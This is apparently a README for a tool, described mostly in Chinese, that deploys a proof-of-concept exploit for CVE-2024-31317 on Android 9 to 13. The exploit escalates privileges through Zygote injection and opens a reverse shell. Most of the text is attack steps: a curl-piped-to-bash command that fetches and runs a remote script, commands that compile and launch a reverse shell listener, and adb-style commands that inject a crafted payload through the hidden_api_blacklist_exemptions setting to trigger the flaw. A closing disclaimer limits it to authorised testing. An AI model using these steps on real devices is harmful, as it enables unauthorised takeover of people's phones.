用于在 Android 9-13 上自动化部署 CVE-2024-31317 PoC 的工具,可通过 Zygote 注入实现权限提升并执行反向 Shell。
A deployment tool for CVE-2024-31317 proof-of-concept exploit targeting Android 9 through 13 devices.
CVE-2024-31317-PoC-Deployer 是一个自动化部署脚本,用于快速生成和配置 CVE-2024-31317 漏洞利用所需的全部文件。该漏洞影响 Android 9 到 13 的设备,允许通过 Zygote 进程实现权限提升并执行任意代码。
reverse_shell.c - C语言实现的反向shell程序payload.txt - 特殊构造的漏洞利用payloadcompile.sh - 自动编译脚本README.txt - 详细使用说明CVE-2024-31317.txt - 漏洞技术分析文档运行远程部署脚本:
pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
编译反向shell:
sh compile.sh
运行反向shell监听器:
sh reverse_shell
payload.txt 到目标设备的 /data/local/tmp/xxx.xxx.xxx 为你的监听服务器IPam force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
此工具仅用于合法的安全测试和研究目的。使用前必须获得目标系统的明确授权。未经授权的使用可能违反法律。开发者不对任何滥用行为负责。
本项目采用 MIT 许可证 - 详情请参阅 LICENSE 文件。